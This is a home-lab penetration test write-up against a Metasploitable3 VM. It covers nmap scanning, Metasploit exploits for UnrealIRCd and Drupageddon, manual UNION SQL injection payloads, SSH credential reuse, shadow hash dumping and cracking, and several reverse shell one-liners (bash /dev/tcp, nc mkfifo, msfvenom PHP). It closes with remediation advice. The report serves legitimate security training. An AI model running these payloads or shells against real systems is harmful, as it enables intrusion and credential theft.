🛡️ Metasploitable3 — Home Lab Penetration Test Report

Author: Sudo-Creator
Environment: VirtualBox · Kali Linux (Attacker) · Metasploitable3 Ubuntu 14.04 (Target)
Target IP: 10.0.2.5
Scope: Full network penetration test — enumeration, exploitation, and post-exploitation
Type: Home Lab / Capture The Flag Practice

---

📋 Table of Contents

• Lab Environment
• Phase 1 — Host Discovery & Port Scanning
• Phase 2 — Service Enumeration
• Phase 3 — Exploitation
  • UnrealIRCd Backdoor (Port 6697)
  • Drupal Drupageddon — SQLi (Port 80)
  • SQL Injection — Payroll App
  • SSH Login — Credential Reuse (Port 22)
  • ProFTPD mod_copy (Port 21)
• Phase 4 — Privilege Escalation
• Phase 5 — Post Exploitation & Reverse Shells
• Findings Summary
• Remediation Recommendations
• Tools Used
• Disclaimer

---

🖥️ Lab Environment

Component	Details
Hypervisor	Oracle VirtualBox
Attacker Machine	Kali Linux
Target Machine	Metasploitable3 (Ubuntu 14.04.6 LTS)
Target MAC	08:00:27:BD:86:A4 (Oracle VirtualBox NIC)
Network	Internal / Host-Only Adapter

---

Phase 1 — Host Discovery & Port Scanning

Nmap Full Port Scan

A comprehensive Nmap scan was performed against the target to identify open ports, running services, and the operating system.

sudo nmap -O -sV -p- -oA metasploitable3 10.0.2.5

Flags used:

Flag	Purpose
-O	OS detection
-sV	Service/version detection
-p-	Scan all 65535 ports
-oA	Save output in all formats

Scan Results

PORT     STATE   SERVICE     VERSION
21/tcp   open    ftp         ProFTPD 1.3.5
22/tcp   open    ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp   open    http        Apache httpd 2.4.7 (Ubuntu)
445/tcp  open    netbios-ssn Samba smbd 3.X - 4.X
631/tcp  open    ipp         CUPS 1.7
3306/tcp open    mysql       MySQL (unauthorized)
3500/tcp open    http        WEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcp open    irc         UnrealIRCd
8080/tcp open    http        Jetty 8.1.7.v20120910

OS Detection: Linux (Ubuntu 14.04), Kernel 3.13.0-170-generic

---

Phase 2 — Service Enumeration

Port 21 — FTP (ProFTPD 1.3.5)

ProFTPD 1.3.5 is known to be vulnerable to the mod_copy command execution vulnerability (CVE-2015-3306). The SITE CPFR/CPTO commands allow any unauthenticated user to copy arbitrary files across the filesystem with the privileges of the ProFTPD daemon (nobody user by default). This can be abused to copy a PHP payload into the web root for remote code execution.

Port 22 — SSH (OpenSSH 6.6.1p1)

The SSH service banner reveals a significantly outdated version of OpenSSH. Metasploit's auxiliary/scanner/ssh/ssh_version scanner confirmed the server supports multiple deprecated algorithms, including arcfour, blowfish-cbc, 3des-cbc, diffie-hellman-group1-sha1, and ecdsa-sha2-nistp256 (weak elliptic curve). No publicly exploitable RCE was identified for this version, but the deprecated cipher suite is a significant weakness.

Port 80 — HTTP (Apache 2.4.7 + Drupal 7.5)

• Visiting http://10.0.2.5 revealed a Drupal 7.5 CMS installation.
• The Drupal version was confirmed via CHANGELOG.txt.
• A robots.txt review exposed several sensitive endpoints: /admin/, /install.php, /update.php, /xmlrpc.php, etc.
• A secondary application payroll_app.php was discovered and found to be vulnerable to UNION-based SQL injection.
• Apache 2.4.7 is also susceptible to mod_rewrite SSRF via unsafe [P] flag usage.

Port 445 — SMB (Samba)

The target machine was running Samba. The version appeared to have been spoofed during Metasploit testing, preventing reliable exploitation during this engagement.

Port 6697 — IRC (UnrealIRCd)

The IRC service was running UnrealIRCd. This service is notorious for a critical backdoor vulnerability in version 3.2.8.1 (CVE-2010-2075) that allows unauthenticated remote command execution.

Port 3306 — MySQL

MySQL was running but returned an unauthorized banner, indicating it was not directly accessible without credentials.

---

Phase 3 — Exploitation

---

1. UnrealIRCd Backdoor — Port 6697

CVE: CVE-2010-2075
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Result: ✅ Shell as boba_fett

UnrealIRCd 3.2.8.1 contains a backdoor introduced via a compromised source code distribution. Sending a specially crafted string to the IRC port triggers command execution on the server.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set LHOST 10.147.62.126
msf exploit(...) > set RHOST 10.147.62.192
msf exploit(...) > set RPORT 6697
msf exploit(...) > set payload cmd/unix/reverse_perl
msf exploit(...) > run

[*] Started reverse TCP handler on 10.147.62.126:4444
[*] 10.147.62.192:6697 - Sending IRC backdoor command
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53611)

whoami
boba_fett

pwd
/opt/unrealircd/Unreal3.2

Note: The initial shell landed in the UnrealIRCd directory as boba_fett. Navigation to other directories was restricted by the user's privilege level, confirming this was a low-privilege foothold.

---

2. Drupal Drupageddon — SQLi — Port 80

CVE: CVE-2014-3704 (Drupageddon)
Module: exploit/multi/http/drupal_drupageddon
Result: ✅ Shell as www-data

Drupal 7.x before 7.32 is vulnerable to a critical SQL injection in the database abstraction layer. This allows unauthenticated attackers to execute arbitrary queries, ultimately leading to remote code execution.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > set RHOSTS 10.147.62.192
msf exploit(...) > set payload php/reverse_perl
msf exploit(...) > run

[*] Started reverse TCP handler on 10.147.62.126:4444
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53682)

whoami
www-data

Post-exploitation enumeration from this shell:

Drupal version confirmed:

cat CHANGELOG.txt
# Drupal 7.5, 2011-07-27

System users discovered:

ls ../../../../../../home

anakin_skywalker   artoo_detoo   ben_kenobi   boba_fett
c_three_pio        chewbacca     darth_vader  greedo
han_solo           jabba_hutt    jarjar_binks kylo_ren
lando_calrissian   leia_organa   luke_skywalker vagrant

---

3. SQL Injection — Payroll App

Type: UNION-Based SQL Injection (Manual)
Target: http://10.0.2.5/payroll_app.php
Result: ✅ Full database dump including plaintext credentials

The payroll_app.php login form was tested with SQL injection payloads. A basic authentication bypass confirmed the vulnerability, and further UNION-based payloads enumerated the full database.

Authentication Bypass:

' or 1=1#

This returned all records from the users table, including username, first_name, last_name, and salary, confirming a 4-column table structure.

Database Version:

' UNION SELECT null, null, @@version, null#
-- Result: 5.5.62-0ubuntu0.14.04.1

Enumerate Databases:

' UNION SELECT null,null,GROUP_CONCAT(schema_name),null FROM information_schema.schemata#
-- Result: information_schema | drupal | mysql | payroll | performance_schema

Enumerate Tables in payroll:

' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,table_name,0x7C)
  FROM information_schema.tables WHERE table_schema='payroll'#
-- Result: users

Enumerate Columns in users:

' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,column_name,0x7C)
  FROM information_schema.columns WHERE table_name='users'#
-- Result: uid | name | pass | username | first_name | last_name | password | salary | ...

Dump Credentials:

' UNION SELECT username, password, salary, null FROM users#

Username	Password	Salary
leia_organa	help_me_obiwan	9560
luke_skywalker	like_my_father_beforeme	1080
han_solo	nerf_herder	1200
artoo_detoo	b00p_b33p	22222
c_three_pio	Pr0t0c07	3200
ben_kenobi	thats_no_m00n	10000
darth_vader	Dark_syD3	6666
anakin_skywalker	but_master:(	1025
jarjar_binks	mesah_p@ssw0rd	2048
lando_calrissian	@dm1n1str8r	40000
boba_fett	mandalorian1	20000
jabba_hutt	my_kinda_skum	65000
greedo	hanSh0tF1rst	50000
chewbacca	rwaaaaawr8	4500
kylo_ren	Daddy_Issues2	6667

---

4. SSH Login — Credential Reuse — Port 22

Module: auxiliary/scanner/ssh/ssh_login
Result: ✅ Shell as vagrant (sudo ALL privileges)

SSH version enumeration was performed first to fingerprint the server:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(...) > set RHOSTS 10.147.62.192
msf auxiliary(...) > run

SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13

The scan confirmed numerous deprecated cipher algorithms, including arcfour256, blowfish-cbc, 3des-cbc, arcfour128, and deprecated key exchange methods including diffie-hellman-group1-sha1. This indicates the system is severely out of date.

The default Metasploitable3 credential pair vagrant:vagrant was then tested:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(...) > set RHOST 10.147.62.192
msf auxiliary(...) > set USERNAME vagrant
msf auxiliary(...) > set PASSWORD vagrant
msf auxiliary(...) > set THREADS 3
msf auxiliary(...) > run

[+] 10.147.62.192:22 - Success: 'vagrant:vagrant'
    uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
[*] SSH session 1 opened

Privilege Check:

sudo -l

User vagrant may run the following commands on metasploitable3-ub1404:
    (ALL : ALL) ALL
    (ALL : ALL) NOPASSWD: ALL

The vagrant user has full unrestricted sudo access with no password required, effectively equivalent to root.

Shell upgraded to interactive PTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

---

5. ProFTPD mod_copy — Port 21

CVE: CVE-2015-3306
Module: exploit/unix/ftp/proftpd_modcopy_exec
Result: ⚠️ Module failed against this target instance

The FTP service was identified as ProFTPD 1.3.5. While the proftpd_modcopy_exec Metasploit module exists for this vulnerability, it did not succeed against this Metasploitable3 instance. This may be due to specific configuration differences or restrictions in this build.

Vulnerability Summary: The mod_copy module allows unauthenticated users to copy files via SITE CPFR / SITE CPTO commands with the daemon's privileges, which can be chained with a webshell for RCE.

---

Phase 4 — Privilege Escalation

Path 1 — Sudo via SSH (vagrant)

The vagrant user already had NOPASSWD: ALL sudo rights, granting immediate root-level access:

sudo su
id
# uid=0(root) gid=0(root) groups=0(root)

Path 2 — Sudo via Credential Reuse (luke_skywalker)

Credentials dumped from the SQL injection were tested over SSH. luke_skywalker:like_my_father_beforeme was valid:

ssh luke_skywalker@10.147.62.192

sudo -l
# User luke_skywalker may run the following commands:
#     (ALL : ALL) ALL

luke_skywalker also had full sudo access. This allowed dumping /etc/shadow:

vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/...
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0
# ... (all 16 hashes dumped)

Offline Hash Cracking Attempt (John the Ripper):

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hashes.txt

The session was aborted due to hardware speed limitations before cracking completed. The hashes use md5crypt ($1$) which is a relatively weak hashing scheme and would be crackable given sufficient compute time.

Proof of Compromise (PoC) — User Creation:

sudo useradd dean
sudo usermod -a -G audio dean
id
# uid=0(root) gid=0(root) groups=0(root)

su dean
id
# uid=1001(dean) gid=1001(dean) groups=1001(dean),29(audio)

---

Phase 5 — Post Exploitation & Reverse Shells

Multiple reverse shell techniques were demonstrated using msfvenom to generate payloads and netcat as the listener.

Bash Reverse Shell

msfvenom -p cmd/unix/reverse_bash LHOST=10.147.62.126 LPORT=4444 R
# Payload: bash -c '0<&217-;exec 217<>/dev/tcp/10.147.62.126/4444;sh <&217 >&217 2>&217'

Listener:

nc -lnvp 4444

Callback received:

connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60784
whoami
vagrant

---

Netcat Reverse Shell (mkfifo)

msfvenom -p cmd/unix/reverse_netcat LHOST=10.147.62.126 LPORT=4444 R
# Payload: mkfifo /tmp/kghs; nc 10.147.62.126 4444 0</tmp/kghs | /bin/sh >/tmp/kghs 2>&1; rm /tmp/kghs

Callback received:

connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60795
whoami
vagrant
id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)

---

PHP Reverse Shell

msfvenom -p php/unix/cmd/reverse_python LHOST=10.147.62.126 LPORT=4444 R > reverse.php

The payload was saved to reverse.php, uploaded to the target via SSH, and executed:

php reverse.php

Callback received from the PHP payload via the Apache web server's PHP interpreter, confirming remote code execution through the web stack.

---

📊 Findings Summary

#	Vulnerability	Port	Severity	Result
1	UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075)	6697	🔴 Critical	Shell as boba_fett
2	Drupal Drupageddon SQLi (CVE-2014-3704)	80	🔴 Critical	Shell as www-data
3	UNION-Based SQL Injection — Payroll App	80	🔴 Critical	Full DB dump + plaintext creds
4	SSH Default Credentials (vagrant:vagrant)	22	🔴 Critical	Root-level access (NOPASSWD sudo)
5	Credential Reuse — luke_skywalker SSH	22	🔴 Critical	Root-level access (sudo ALL)
6	Shadow File Dumped — md5crypt Hashes	N/A	🔴 Critical	16 hashes extracted
7	ProFTPD 1.3.5 mod_copy (CVE-2015-3306)	21	🟠 High	Not exploitable in this build
8	Deprecated SSH Cipher Suite	22	🟡 Medium	Info only — legacy algos confirmed
9	Drupal CHANGELOG.txt / robots.txt exposed	80	🟡 Medium	Version disclosure
10	Plaintext Credentials in Database	3306	🔴 Critical	Passwords stored in cleartext

---

🔧 Remediation Recommendations

Finding	Recommendation
UnrealIRCd Backdoor	Upgrade to a patched, verified version of UnrealIRCd; verify source integrity with checksums
Drupal Drupageddon	Upgrade Drupal to the latest stable release; apply security patches immediately
SQL Injection (Payroll)	Use parameterised queries / prepared statements; never concatenate user input into SQL
Default SSH Credentials	Remove or rotate default vagrant credentials; enforce key-based authentication only
Credential Reuse	Enforce unique passwords per service; implement a password policy
Weak Password Hashing	Replace md5crypt ($1$) with bcrypt or Argon2id; never store passwords in plaintext
Deprecated SSH Ciphers	Harden sshd_config to disable all deprecated algorithms; upgrade to OpenSSH 9.x+
Sudo Misconfiguration	Remove NOPASSWD: ALL grants; apply least-privilege sudo rules per user
Version Disclosure	Restrict access to CHANGELOG.txt, robots.txt, and sensitive configuration files
ProFTPD mod_copy	Disable mod_copy in proftpd.conf or upgrade to a patched version

---

🛠️ Tools Used

Tool	Purpose
nmap	Port scanning, service/version detection, OS fingerprinting
Metasploit Framework	Exploitation, auxiliary scanners, session management
msfvenom	Reverse shell payload generation
netcat (nc)	Reverse shell listener
John the Ripper	Offline password hash cracking
SSH	Remote access and payload delivery
Manual SQL Injection	UNION-based injection via browser / curl

---

⚠️ Disclaimer

This penetration test was conducted exclusively within a personal home lab environment using intentionally vulnerable software (Metasploitable3 by Rapid7). All activity was performed on isolated virtual machines with no connection to any production network, third-party systems, or external infrastructure.

This report is intended solely for educational purposes and personal skill development. Performing any of these techniques against systems without explicit written permission is illegal and unethical.

The author does not condone unauthorised access to computer systems.

---

_{Built with 🔐 by Sudo-Creator}